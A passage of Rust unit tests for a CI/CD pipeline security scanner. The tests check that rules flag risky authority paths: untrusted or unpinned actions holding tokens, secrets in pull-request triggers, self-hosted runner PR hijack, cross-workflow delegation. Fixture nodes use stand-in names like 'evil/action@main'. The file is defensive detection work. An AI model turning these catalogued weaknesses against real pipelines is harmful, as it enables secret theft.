6928    #[test]
6929    fn artifact_crossing_firstparty_producer_untrusted_consumer_silent() {
6930        // First-party producer -> untrusted consumer: should NOT fire (benign direction)
6931        let mut g = AuthorityGraph::new(source("ci.yml"));
6932        let secret = g.add_node(NodeKind::Secret, "KEY", TrustZone::FirstParty);
6933        let build = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
6934        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::FirstParty);
6935        let deploy = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
6936
6937        g.add_edge(build, secret, EdgeKind::HasAccessTo);
6938        g.add_edge(build, artifact, EdgeKind::Produces);
6939        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6940
6941        let findings = artifact_boundary_crossing(&g);
6942        assert_eq!(
6943            findings.len(),
6944            0,
6945            "first-party -> untrusted should not fire"
6946        );
6947    }
6948
6949    #[test]
6950    fn propagation_to_sha_pinned_is_high_not_critical() {
6951        let mut g = AuthorityGraph::new(source("ci.yml"));
6952        let mut meta = std::collections::HashMap::new();
6953        meta.insert(
6954            "digest".into(),
6955            "a5ac7e51b41094c92402da3b24376905380afc29".into(),
6956        );
6957        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
6958        let step = g.add_node(NodeKind::Step, "checkout", TrustZone::ThirdParty);
6959        let image = g.add_node_with_metadata(
6960            NodeKind::Image,
6961            "actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29",
6962            TrustZone::ThirdParty,
6963            meta,
6964        );
6965
6966        g.add_edge(step, identity, EdgeKind::HasAccessTo);
6967        g.add_edge(step, image, EdgeKind::UsesImage);
6968
6969        let findings = authority_propagation(&g, 4);
6970        // Should find propagation to the SHA-pinned image
6971        let image_findings: Vec<_> = findings
6972            .iter()
6973            .filter(|f| f.nodes_involved.contains(&image))
6974            .collect();
6975        assert!(!image_findings.is_empty());
6976        // SHA-pinned targets get High, not Critical (non-OIDC source)
6977        assert_eq!(image_findings[0].severity, Severity::High);
6978    }
6979
6980    #[test]
6981    fn oidc_identity_to_pinned_third_party_is_critical() {
6982        let mut g = AuthorityGraph::new(source("ci.yml"));
6983
6984        // OIDC-federated cloud identity — token itself is the threat
6985        let mut id_meta = std::collections::HashMap::new();
6986        id_meta.insert(META_OIDC.into(), "true".into());
6987        let identity = g.add_node_with_metadata(
6988            NodeKind::Identity,
6989            "AWS_OIDC_ROLE",
6990            TrustZone::FirstParty,
6991            id_meta,
6992        );
6993
6994        // SHA-pinned ThirdParty image — would normally be High without OIDC
6995        let mut img_meta = std::collections::HashMap::new();
6996        img_meta.insert(
6997            META_DIGEST.into(),
6998            "a5ac7e51b41094c92402da3b24376905380afc29".into(),
6999        );
7000        let image = g.add_node_with_metadata(
7001            NodeKind::Image,
7002            "aws-actions/configure-aws-credentials@a5ac7e51b41094c92402da3b24376905380afc29",
7003            TrustZone::ThirdParty,
7004            img_meta,
7005        );
7006
7007        // Step in ThirdParty zone holds the OIDC identity and uses the pinned image
7008        let step = g.add_node(
7009            NodeKind::Step,
7010            "configure-aws-credentials",
7011            TrustZone::ThirdParty,
7012        );
7013        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7014        g.add_edge(step, image, EdgeKind::UsesImage);
7015
7016        let findings = authority_propagation(&g, 4);
7017        let image_findings: Vec<_> = findings
7018            .iter()
7019            .filter(|f| f.nodes_involved.contains(&image))
7020            .collect();
7021        assert!(
7022            !image_findings.is_empty(),
7023            "expected OIDC→pinned propagation finding"
7024        );
7025        // OIDC source escalates pinned ThirdParty from High → Critical
7026        assert_eq!(image_findings[0].severity, Severity::Critical);
7027    }
7028
7029    #[test]
7030    fn propagation_to_untrusted_is_critical() {
7031        let mut g = AuthorityGraph::new(source("ci.yml"));
7032        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7033        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7034        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7035
7036        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7037        g.add_edge(step, image, EdgeKind::UsesImage);
7038
7039        let findings = authority_propagation(&g, 4);
7040        let image_findings: Vec<_> = findings
7041            .iter()
7042            .filter(|f| f.nodes_involved.contains(&image))
7043            .collect();
7044        assert!(!image_findings.is_empty());
7045        assert_eq!(image_findings[0].severity, Severity::Critical);
7046    }
7047
7048    #[test]
7049    fn long_lived_credential_detected() {
7050        let mut g = AuthorityGraph::new(source("ci.yml"));
7051        g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
7052        g.add_node(NodeKind::Secret, "NPM_TOKEN", TrustZone::FirstParty);
7053        g.add_node(NodeKind::Secret, "DEPLOY_API_KEY", TrustZone::FirstParty);
7054        // Non-matching names
7055        g.add_node(NodeKind::Secret, "CACHE_TTL", TrustZone::FirstParty);
7056
7057        let findings = long_lived_credential(&g);
7058        assert_eq!(findings.len(), 2); // AWS_ACCESS_KEY_ID + DEPLOY_API_KEY
7059        assert!(findings
7060            .iter()
7061            .all(|f| f.category == FindingCategory::LongLivedCredential));
7062    }
7063
7064    #[test]
7065    fn duplicate_unpinned_actions_deduplicated() {
7066        let mut g = AuthorityGraph::new(source("ci.yml"));
7067        // Same action used in two jobs — two Image nodes, same name
7068        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
7069        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
7070        g.add_node(
7071            NodeKind::Image,
7072            "actions/setup-node@v3",
7073            TrustZone::Untrusted,
7074        );
7075
7076        let findings = unpinned_action(&g);
7077        // Should get 2 findings (checkout + setup-node), not 3
7078        assert_eq!(findings.len(), 2);
7079    }
7080
7081    #[test]
7082    fn broad_identity_scope_flagged_as_high() {
7083        let mut g = AuthorityGraph::new(source("ci.yml"));
7084        let mut meta = std::collections::HashMap::new();
7085        meta.insert(META_PERMISSIONS.into(), "write-all".into());
7086        meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7087        let identity = g.add_node_with_metadata(
7088            NodeKind::Identity,
7089            "GITHUB_TOKEN",
7090            TrustZone::FirstParty,
7091            meta,
7092        );
7093        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7094        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7095
7096        let findings = over_privileged_identity(&g);
7097        assert_eq!(findings.len(), 1);
7098        assert_eq!(findings[0].severity, Severity::High);
7099        assert!(findings[0].message.contains("broad"));
7100    }
7101
7102    #[test]
7103    fn unknown_identity_scope_flagged_as_medium() {
7104        let mut g = AuthorityGraph::new(source("ci.yml"));
7105        let mut meta = std::collections::HashMap::new();
7106        meta.insert(META_PERMISSIONS.into(), "custom-scope".into());
7107        meta.insert(META_IDENTITY_SCOPE.into(), "unknown".into());
7108        let identity = g.add_node_with_metadata(
7109            NodeKind::Identity,
7110            "GITHUB_TOKEN",
7111            TrustZone::FirstParty,
7112            meta,
7113        );
7114        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7115        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7116
7117        let findings = over_privileged_identity(&g);
7118        assert_eq!(findings.len(), 1);
7119        assert_eq!(findings[0].severity, Severity::Medium);
7120        assert!(findings[0].message.contains("unknown"));
7121    }
7122
7123    #[test]
7124    fn floating_image_unpinned_container_flagged() {
7125        let mut g = AuthorityGraph::new(source("ci.yml"));
7126        let mut meta = std::collections::HashMap::new();
7127        meta.insert(META_CONTAINER.into(), "true".into());
7128        g.add_node_with_metadata(NodeKind::Image, "ubuntu:22.04", TrustZone::Untrusted, meta);
7129
7130        let findings = floating_image(&g);
7131        assert_eq!(findings.len(), 1);
7132        assert_eq!(findings[0].category, FindingCategory::FloatingImage);
7133        assert_eq!(findings[0].severity, Severity::Medium);
7134    }
7135
7136    #[test]
7137    fn partial_graph_preserves_critical_findings() {
7138        let mut g = AuthorityGraph::new(source("ci.yml"));
7139        g.mark_partial("matrix strategy hides some authority paths");
7140
7141        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7142        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7143        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7144
7145        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7146        g.add_edge(step, image, EdgeKind::UsesImage);
7147
7148        let findings = run_all_rules(&g, 4);
7149        assert!(findings
7150            .iter()
7151            .any(|f| f.category == FindingCategory::AuthorityPropagation));
7152        assert!(findings
7153            .iter()
7154            .any(|f| f.category == FindingCategory::UntrustedWithAuthority));
7155        assert!(
7156            findings.iter().any(|f| f.severity == Severity::Critical),
7157            "partial graph completeness must not down-rank critical findings"
7158        );
7159    }
7160
7161    #[test]
7162    fn unknown_graph_preserves_critical_findings() {
7163        let mut g = AuthorityGraph::new(source("ci.yml"));
7164        g.completeness = crate::graph::AuthorityCompleteness::Unknown;
7165
7166        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7167        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7168        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7169
7170        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7171        g.add_edge(step, image, EdgeKind::UsesImage);
7172
7173        let findings = run_all_rules(&g, 4);
7174        assert!(
7175            findings.iter().any(|f| f.severity == Severity::Critical),
7176            "unknown graph completeness must not down-rank critical findings"
7177        );
7178    }
7179
7180    #[test]
7181    fn complete_graph_keeps_critical_findings() {
7182        let mut g = AuthorityGraph::new(source("ci.yml"));
7183
7184        let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
7185        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
7186        let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
7187
7188        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7189        g.add_edge(step, image, EdgeKind::UsesImage);
7190
7191        let findings = run_all_rules(&g, 4);
7192        assert!(findings.iter().any(|f| f.severity == Severity::Critical));
7193    }
7194
7195    #[test]
7196    fn floating_image_digest_pinned_container_not_flagged() {
7197        let mut g = AuthorityGraph::new(source("ci.yml"));
7198        let mut meta = std::collections::HashMap::new();
7199        meta.insert(META_CONTAINER.into(), "true".into());
7200        g.add_node_with_metadata(
7201            NodeKind::Image,
7202            "ubuntu@sha256:a5ac7e51b41094c92402da3b24376905380afc29a5ac7e51b41094c92402da3b",
7203            TrustZone::ThirdParty,
7204            meta,
7205        );
7206
7207        let findings = floating_image(&g);
7208        assert!(
7209            findings.is_empty(),
7210            "digest-pinned container should not be flagged"
7211        );
7212    }
7213
7214    #[test]
7215    fn unpinned_action_does_not_flag_container_images() {
7216        // Regression: container Image nodes are handled by floating_image, not unpinned_action.
7217        // The same node must not generate findings from both rules.
7218        let mut g = AuthorityGraph::new(source("ci.yml"));
7219        let mut meta = std::collections::HashMap::new();
7220        meta.insert(META_CONTAINER.into(), "true".into());
7221        g.add_node_with_metadata(NodeKind::Image, "ubuntu:22.04", TrustZone::Untrusted, meta);
7222
7223        let findings = unpinned_action(&g);
7224        assert!(
7225            findings.is_empty(),
7226            "unpinned_action must skip container images to avoid double-flagging"
7227        );
7228    }
7229
7230    #[test]
7231    fn floating_image_ignores_action_images() {
7232        let mut g = AuthorityGraph::new(source("ci.yml"));
7233        // Image node without META_CONTAINER — this is a step uses: action, not a container
7234        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
7235
7236        let findings = floating_image(&g);
7237        assert!(
7238            findings.is_empty(),
7239            "floating_image should not flag step actions"
7240        );
7241    }
7242
7243    #[test]
7244    fn persisted_credential_rule_fires_on_persists_to_edge() {
7245        let mut g = AuthorityGraph::new(source("ci.yml"));
7246        let token = g.add_node(
7247            NodeKind::Identity,
7248            "System.AccessToken",
7249            TrustZone::FirstParty,
7250        );
7251        let checkout = g.add_node(NodeKind::Step, "checkout", TrustZone::FirstParty);
7252        g.add_edge(checkout, token, EdgeKind::PersistsTo);
7253
7254        let findings = persisted_credential(&g);
7255        assert_eq!(findings.len(), 1);
7256        assert_eq!(findings[0].category, FindingCategory::PersistedCredential);
7257        assert_eq!(findings[0].severity, Severity::High);
7258        assert!(findings[0].message.contains("persistCredentials"));
7259    }
7260
7261    #[test]
7262    fn untrusted_with_cli_flag_exposed_secret_notes_log_exposure() {
7263        let mut g = AuthorityGraph::new(source("ci.yml"));
7264        let step = g.add_node(NodeKind::Step, "TerraformCLI@0", TrustZone::Untrusted);
7265        let mut meta = std::collections::HashMap::new();
7266        meta.insert(META_CLI_FLAG_EXPOSED.into(), "true".into());
7267        let secret =
7268            g.add_node_with_metadata(NodeKind::Secret, "db_password", TrustZone::FirstParty, meta);
7269        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7270
7271        let findings = untrusted_with_authority(&g);
7272        assert_eq!(findings.len(), 1);
7273        assert!(
7274            findings[0].message.contains("-var flag"),
7275            "message should note -var flag log exposure"
7276        );
7277        assert!(matches!(
7278            findings[0].recommendation,
7279            Recommendation::Manual { .. }
7280        ));
7281    }
7282
7283    #[test]
7284    fn constrained_identity_scope_not_flagged() {
7285        let mut g = AuthorityGraph::new(source("ci.yml"));
7286        let mut meta = std::collections::HashMap::new();
7287        meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
7288        meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
7289        let identity = g.add_node_with_metadata(
7290            NodeKind::Identity,
7291            "GITHUB_TOKEN",
7292            TrustZone::FirstParty,
7293            meta,
7294        );
7295        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7296        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7297
7298        let findings = over_privileged_identity(&g);
7299        assert!(
7300            findings.is_empty(),
7301            "constrained scope should not be flagged"
7302        );
7303    }
7304
7305    #[test]
7306    fn trigger_context_mismatch_fires_on_pull_request_target_with_secret() {
7307        let mut g = AuthorityGraph::new(source("ci.yml"));
7308        g.metadata
7309            .insert(META_TRIGGER.into(), "pull_request_target".into());
7310        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7311        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7312        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7313
7314        let findings = trigger_context_mismatch(&g);
7315        assert_eq!(findings.len(), 1);
7316        assert_eq!(findings[0].severity, Severity::Critical);
7317        assert_eq!(
7318            findings[0].category,
7319            FindingCategory::TriggerContextMismatch
7320        );
7321    }
7322
7323    #[test]
7324    fn trigger_context_mismatch_no_fire_without_trigger_metadata() {
7325        let mut g = AuthorityGraph::new(source("ci.yml"));
7326        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7327        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7328        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7329
7330        let findings = trigger_context_mismatch(&g);
7331        assert!(findings.is_empty(), "no trigger metadata → no finding");
7332    }
7333
7334    #[test]
7335    fn cross_workflow_authority_chain_detected() {
7336        let mut g = AuthorityGraph::new(source("ci.yml"));
7337        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7338        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7339        let external = g.add_node(
7340            NodeKind::Image,
7341            "evil/workflow.yml@main",
7342            TrustZone::Untrusted,
7343        );
7344        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7345        g.add_edge(step, external, EdgeKind::DelegatesTo);
7346
7347        let findings = cross_workflow_authority_chain(&g);
7348        assert_eq!(findings.len(), 1);
7349        assert_eq!(findings[0].severity, Severity::Critical);
7350        assert_eq!(
7351            findings[0].category,
7352            FindingCategory::CrossWorkflowAuthorityChain
7353        );
7354    }
7355
7356    #[test]
7357    fn cross_workflow_authority_chain_no_fire_if_local_delegation() {
7358        let mut g = AuthorityGraph::new(source("ci.yml"));
7359        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7360        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7361        let local = g.add_node(NodeKind::Image, "./local-action", TrustZone::FirstParty);
7362        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7363        g.add_edge(step, local, EdgeKind::DelegatesTo);
7364
7365        let findings = cross_workflow_authority_chain(&g);
7366        assert!(
7367            findings.is_empty(),
7368            "FirstParty delegation should not be flagged"
7369        );
7370    }
7371
7372    #[test]
7373    fn authority_cycle_detected() {
7374        let mut g = AuthorityGraph::new(source("ci.yml"));
7375        let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
7376        let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
7377        g.add_edge(a, b, EdgeKind::DelegatesTo);
7378        g.add_edge(b, a, EdgeKind::DelegatesTo);
7379
7380        let findings = authority_cycle(&g);
7381        assert_eq!(findings.len(), 1);
7382        assert_eq!(findings[0].category, FindingCategory::AuthorityCycle);
7383        assert_eq!(findings[0].severity, Severity::High);
7384    }
7385
7386    #[test]
7387    fn authority_cycle_no_fire_for_acyclic_graph() {
7388        let mut g = AuthorityGraph::new(source("ci.yml"));
7389        let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
7390        let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
7391        let c = g.add_node(NodeKind::Step, "C", TrustZone::FirstParty);
7392        g.add_edge(a, b, EdgeKind::DelegatesTo);
7393        g.add_edge(b, c, EdgeKind::DelegatesTo);
7394
7395        let findings = authority_cycle(&g);
7396        assert!(findings.is_empty(), "acyclic graph must not fire");
7397    }
7398
7399    #[test]
7400    fn uplift_without_attestation_fires_when_oidc_no_attests() {
7401        let mut g = AuthorityGraph::new(source("ci.yml"));
7402        let mut meta = std::collections::HashMap::new();
7403        meta.insert(META_OIDC.into(), "true".into());
7404        let identity = g.add_node_with_metadata(
7405            NodeKind::Identity,
7406            "AWS/deploy-role",
7407            TrustZone::FirstParty,
7408            meta,
7409        );
7410        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7411        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7412
7413        let findings = uplift_without_attestation(&g);
7414        assert_eq!(findings.len(), 1);
7415        assert_eq!(findings[0].severity, Severity::Info);
7416        assert_eq!(
7417            findings[0].category,
7418            FindingCategory::UpliftWithoutAttestation
7419        );
7420    }
7421
7422    #[test]
7423    fn uplift_without_attestation_no_fire_when_attests_present() {
7424        let mut g = AuthorityGraph::new(source("ci.yml"));
7425        let mut id_meta = std::collections::HashMap::new();
7426        id_meta.insert(META_OIDC.into(), "true".into());
7427        let identity = g.add_node_with_metadata(
7428            NodeKind::Identity,
7429            "AWS/deploy-role",
7430            TrustZone::FirstParty,
7431            id_meta,
7432        );
7433        let mut step_meta = std::collections::HashMap::new();
7434        step_meta.insert(META_ATTESTS.into(), "true".into());
7435        let attest_step =
7436            g.add_node_with_metadata(NodeKind::Step, "attest", TrustZone::FirstParty, step_meta);
7437        let build_step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7438        g.add_edge(build_step, identity, EdgeKind::HasAccessTo);
7439        // Touch attest_step so the variable is used (avoid unused warning)
7440        let _ = attest_step;
7441
7442        let findings = uplift_without_attestation(&g);
7443        assert!(findings.is_empty(), "attestation present → no finding");
7444    }
7445
7446    #[test]
7447    fn uplift_without_attestation_no_fire_without_oidc() {
7448        let mut g = AuthorityGraph::new(source("ci.yml"));
7449        let mut meta = std::collections::HashMap::new();
7450        meta.insert(META_PERMISSIONS.into(), "write-all".into());
7451        meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7452        // Note: no META_OIDC
7453        let identity = g.add_node_with_metadata(
7454            NodeKind::Identity,
7455            "GITHUB_TOKEN",
7456            TrustZone::FirstParty,
7457            meta,
7458        );
7459        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7460        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7461
7462        let findings = uplift_without_attestation(&g);
7463        assert!(
7464            findings.is_empty(),
7465            "broad identity without OIDC must not fire"
7466        );
7467    }
7468
7469    #[test]
7470    fn self_mutating_pipeline_untrusted_is_critical() {
7471        let mut g = AuthorityGraph::new(source("ci.yml"));
7472        let mut meta = std::collections::HashMap::new();
7473        meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
7474        g.add_node_with_metadata(NodeKind::Step, "fork-step", TrustZone::Untrusted, meta);
7475
7476        let findings = self_mutating_pipeline(&g);
7477        assert_eq!(findings.len(), 1);
7478        assert_eq!(findings[0].severity, Severity::Critical);
7479        assert_eq!(findings[0].category, FindingCategory::SelfMutatingPipeline);
7480    }
7481
7482    #[test]
7483    fn self_mutating_pipeline_privileged_step_is_high() {
7484        let mut g = AuthorityGraph::new(source("ci.yml"));
7485        let mut meta = std::collections::HashMap::new();
7486        meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
7487        let step = g.add_node_with_metadata(NodeKind::Step, "build", TrustZone::FirstParty, meta);
7488        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7489        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7490
7491        let findings = self_mutating_pipeline(&g);
7492        assert_eq!(findings.len(), 1);
7493        assert_eq!(findings[0].severity, Severity::High);
7494    }
7495
7496    #[test]
7497    fn trigger_context_mismatch_fires_on_ado_pr_with_secret_as_high() {
7498        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7499        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7500        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7501        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7502        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7503
7504        let findings = trigger_context_mismatch(&g);
7505        assert_eq!(findings.len(), 1);
7506        assert_eq!(findings[0].severity, Severity::High);
7507        assert_eq!(
7508            findings[0].category,
7509            FindingCategory::TriggerContextMismatch
7510        );
7511    }
7512
7513    #[test]
7514    fn cross_workflow_authority_chain_third_party_is_high() {
7515        let mut g = AuthorityGraph::new(source("ci.yml"));
7516        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7517        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7518        // ThirdParty target (SHA-pinned external workflow)
7519        let external = g.add_node(
7520            NodeKind::Image,
7521            "org/repo/.github/workflows/deploy.yml@a5ac7e51b41094c92402da3b24376905380afc29",
7522            TrustZone::ThirdParty,
7523        );
7524        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7525        g.add_edge(step, external, EdgeKind::DelegatesTo);
7526
7527        let findings = cross_workflow_authority_chain(&g);
7528        assert_eq!(findings.len(), 1);
7529        assert_eq!(
7530            findings[0].severity,
7531            Severity::High,
7532            "ThirdParty delegation target should be High (Critical reserved for Untrusted)"
7533        );
7534        assert_eq!(
7535            findings[0].category,
7536            FindingCategory::CrossWorkflowAuthorityChain
7537        );
7538    }
7539
7540    #[test]
7541    fn self_mutating_pipeline_first_party_no_authority_is_medium() {
7542        let mut g = AuthorityGraph::new(source("ci.yml"));
7543        let mut meta = std::collections::HashMap::new();
7544        meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
7545        // FirstParty step writes the gate but holds no secret/identity access.
7546        g.add_node_with_metadata(NodeKind::Step, "set-version", TrustZone::FirstParty, meta);
7547
7548        let findings = self_mutating_pipeline(&g);
7549        assert_eq!(findings.len(), 1);
7550        assert_eq!(findings[0].severity, Severity::Medium);
7551        assert_eq!(findings[0].category, FindingCategory::SelfMutatingPipeline);
7552    }
7553
7554    #[test]
7555    fn authority_cycle_3node_cycle_includes_all_members() {
7556        // A → B → C → A should produce one finding whose nodes_involved
7557        // contains all three node IDs, not just the back-edge endpoints.
7558        let mut g = AuthorityGraph::new(source("test.yml"));
7559        let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
7560        let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
7561        let c = g.add_node(NodeKind::Step, "C", TrustZone::FirstParty);
7562        g.add_edge(a, b, EdgeKind::DelegatesTo);
7563        g.add_edge(b, c, EdgeKind::DelegatesTo);
7564        g.add_edge(c, a, EdgeKind::DelegatesTo);
7565
7566        let findings = authority_cycle(&g);
7567        assert_eq!(findings.len(), 1);
7568        assert_eq!(findings[0].category, FindingCategory::AuthorityCycle);
7569        assert!(
7570            findings[0].nodes_involved.contains(&a),
7571            "A must be in nodes_involved"
7572        );
7573        assert!(
7574            findings[0].nodes_involved.contains(&b),
7575            "B must be in nodes_involved — middle of A→B→C→A cycle"
7576        );
7577        assert!(
7578            findings[0].nodes_involved.contains(&c),
7579            "C must be in nodes_involved"
7580        );
7581    }
7582
7583    #[test]
7584    fn variable_group_in_pr_job_fires_on_pr_trigger_with_var_group() {
7585        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7586        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7587        let mut secret_meta = std::collections::HashMap::new();
7588        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7589        let secret = g.add_node_with_metadata(
7590            NodeKind::Secret,
7591            "prod-deploy-secrets",
7592            TrustZone::FirstParty,
7593            secret_meta,
7594        );
7595        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7596        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7597
7598        let findings = variable_group_in_pr_job(&g);
7599        assert_eq!(findings.len(), 1);
7600        assert_eq!(findings[0].severity, Severity::Critical);
7601        assert_eq!(findings[0].category, FindingCategory::VariableGroupInPrJob);
7602        assert!(findings[0].message.contains("prod-deploy-secrets"));
7603    }
7604
7605    #[test]
7606    fn variable_group_in_pr_job_no_fire_without_pr_trigger() {
7607        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7608        // No trigger metadata — should not fire
7609        let mut secret_meta = std::collections::HashMap::new();
7610        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7611        let secret = g.add_node_with_metadata(
7612            NodeKind::Secret,
7613            "prod-deploy-secrets",
7614            TrustZone::FirstParty,
7615            secret_meta,
7616        );
7617        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7618        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7619
7620        let findings = variable_group_in_pr_job(&g);
7621        assert!(
7622            findings.is_empty(),
7623            "no PR trigger → variable_group_in_pr_job must not fire"
7624        );
7625    }
7626
7627    #[test]
7628    fn variable_group_in_pr_job_no_fire_when_pr_none() {
7629        // Regression for Bug 1: pr: none in ADO means no PR trigger — the parser
7630        // must not set META_TRIGGER, so variable_group_in_pr_job must not fire.
7631        // This test validates at the rule level: no META_TRIGGER → no firing.
7632        let mut g = AuthorityGraph::new(source("weekly-report.yml"));
7633        // No META_TRIGGER inserted — mirrors what the parser produces for pr: none.
7634        let mut secret_meta = std::collections::HashMap::new();
7635        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7636        let secret = g.add_node_with_metadata(
7637            NodeKind::Secret,
7638            "ado-report-secrets",
7639            TrustZone::FirstParty,
7640            secret_meta,
7641        );
7642        let step = g.add_node(NodeKind::Step, "report-step", TrustZone::FirstParty);
7643        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7644
7645        let findings = variable_group_in_pr_job(&g);
7646        assert!(
7647            findings.is_empty(),
7648            "pr: none (no META_TRIGGER) → variable_group_in_pr_job must not fire; got: {findings:#?}"
7649        );
7650    }
7651
7652    #[test]
7653    fn self_hosted_pool_pr_hijack_fires_when_all_three_factors_present() {
7654        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7655        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7656
7657        let mut pool_meta = std::collections::HashMap::new();
7658        pool_meta.insert(META_SELF_HOSTED.into(), "true".into());
7659        g.add_node_with_metadata(
7660            NodeKind::Image,
7661            "self-hosted-pool",
7662            TrustZone::FirstParty,
7663            pool_meta,
7664        );
7665
7666        let mut step_meta = std::collections::HashMap::new();
7667        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7668        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7669
7670        let findings = self_hosted_pool_pr_hijack(&g);
7671        assert_eq!(findings.len(), 1);
7672        assert_eq!(findings[0].severity, Severity::Critical);
7673        assert_eq!(
7674            findings[0].category,
7675            FindingCategory::SelfHostedPoolPrHijack
7676        );
7677        assert!(findings[0].message.contains("self-hosted"));
7678    }
7679
7680    #[test]
7681    fn self_hosted_pool_pr_hijack_no_fire_without_pr_trigger() {
7682        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7683        // No trigger metadata
7684
7685        let mut pool_meta = std::collections::HashMap::new();
7686        pool_meta.insert(META_SELF_HOSTED.into(), "true".into());
7687        g.add_node_with_metadata(
7688            NodeKind::Image,
7689            "self-hosted-pool",
7690            TrustZone::FirstParty,
7691            pool_meta,
7692        );
7693
7694        let mut step_meta = std::collections::HashMap::new();
7695        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7696        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7697
7698        let findings = self_hosted_pool_pr_hijack(&g);
7699        assert!(
7700            findings.is_empty(),
7701            "no PR trigger → self_hosted_pool_pr_hijack must not fire"
7702        );
7703    }
7704
7705    #[test]
7706    fn service_connection_scope_mismatch_fires_on_pr_broad_non_oidc() {
